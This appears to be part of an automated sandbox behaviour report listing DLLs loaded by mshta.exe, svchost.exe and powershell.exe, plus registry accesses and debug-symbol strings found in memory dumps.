Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: \??\C:\Windows\dll\System.Core.pdb_ source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdbT source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdbesv source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1 source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdbessA source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbK source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: #.dll.pdb source: powershell.exe, 00000005.00000002.2129677364.0000024B803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2321469926.0000024BF74D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D0803CA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbq source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0EE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdban0K source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb?"#v source: powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbX source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbV source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdbb\ source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h source: powershell.exe, 00000007.00000002.2400988982.0000022DFF04E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7BA6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbSt^K source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdbE source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdbpdblA source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7BA6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbl source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb- source: powershell.exe, 00000007.00000002.2407828166.0000022DFF693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb#{& source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000007.00000002.2407828166.0000022DFF693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbS{ source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb( source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdbO source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp
